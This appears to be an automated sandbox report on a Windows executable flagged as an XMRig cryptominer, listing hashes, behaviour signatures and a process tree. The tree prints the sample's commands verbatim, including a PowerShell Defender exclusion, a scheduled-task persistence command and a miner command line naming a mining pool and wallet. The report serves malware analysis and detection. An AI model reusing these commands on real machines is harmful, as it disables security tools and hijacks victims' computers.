Analysis
-
max time kernel
135s -
max time network
163s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 14:35
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
1.3MB
-
MD5
8851bd99bb8728fa34a8a7afce73b36e
-
SHA1
d9a7790e4f41673f6a484180c717c778b258308e
-
SHA256
66d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d
-
SHA512
ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f
-
SSDEEP
24576:n8E0T8wpeIq79Bu+pj+SRLQdqJptmfXCFIif/:nZ0TbpeIq7HumRLQkJpoKFIif
Malware Config
Signatures
-
XMRig Miner payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/1856-187-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1856-188-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/1856-189-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1856-190-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1856-192-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
OWT.exepid process 4200 OWT.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
OWT.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation OWT.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
OWT.exedescription pid process target process PID 4200 set thread context of 1856 4200 OWT.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3504 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exeOWT.exepid process 1888 powershell.exe 1888 powershell.exe 4376 powershell.exe 4376 powershell.exe 4200 OWT.exe 4200 OWT.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 648 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
file.exepowershell.exeOWT.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 588 file.exe Token: SeDebugPrivilege 1888 powershell.exe Token: SeDebugPrivilege 4200 OWT.exe Token: SeDebugPrivilege 4376 powershell.exe Token: SeLockMemoryPrivilege 1856 vbc.exe Token: SeLockMemoryPrivilege 1856 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 1856 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
file.execmd.exeOWT.execmd.exedescription pid process target process PID 588 wrote to memory of 1888 588 file.exe powershell.exe PID 588 wrote to memory of 1888 588 file.exe powershell.exe PID 588 wrote to memory of 2100 588 file.exe cmd.exe PID 588 wrote to memory of 2100 588 file.exe cmd.exe PID 2100 wrote to memory of 3504 2100 cmd.exe timeout.exe PID 2100 wrote to memory of 3504 2100 cmd.exe timeout.exe PID 2100 wrote to memory of 4200 2100 cmd.exe OWT.exe PID 2100 wrote to memory of 4200 2100 cmd.exe OWT.exe PID 4200 wrote to memory of 4376 4200 OWT.exe powershell.exe PID 4200 wrote to memory of 4376 4200 OWT.exe powershell.exe PID 4200 wrote to memory of 1264 4200 OWT.exe cmd.exe PID 4200 wrote to memory of 1264 4200 OWT.exe cmd.exe PID 1264 wrote to memory of 540 1264 cmd.exe schtasks.exe PID 1264 wrote to memory of 540 1264 cmd.exe schtasks.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe PID 4200 wrote to memory of 1856 4200 OWT.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4CC8.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:3504 -
C:\ProgramData\winrar\OWT.exe"C:\ProgramData\winrar\OWT.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4376 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"5⤵
- Creates scheduled task(s)
PID:540 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1856
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD58851bd99bb8728fa34a8a7afce73b36e
SHA1d9a7790e4f41673f6a484180c717c778b258308e
SHA25666d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d
SHA512ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f
-
Filesize
1.3MB
MD58851bd99bb8728fa34a8a7afce73b36e
SHA1d9a7790e4f41673f6a484180c717c778b258308e
SHA25666d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d
SHA512ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
138B
MD5faa297b8630d6d87df59ae204e44dcf7
SHA1a05a77869198ad6c2e10ddcd0f6222127cc3e022
SHA2567021d9c2b7667d5a0474eb34f58d1d767acb71e644b92ce0a4d7d6ea8ff82685
SHA51243a65b362d1023adda9de42aab676756548b3935aa34cb719dd42f2802e527552a31482a5b43e62587d0787147dfd0e7fe51ddd726ef67b3098eb1edcf0df5d8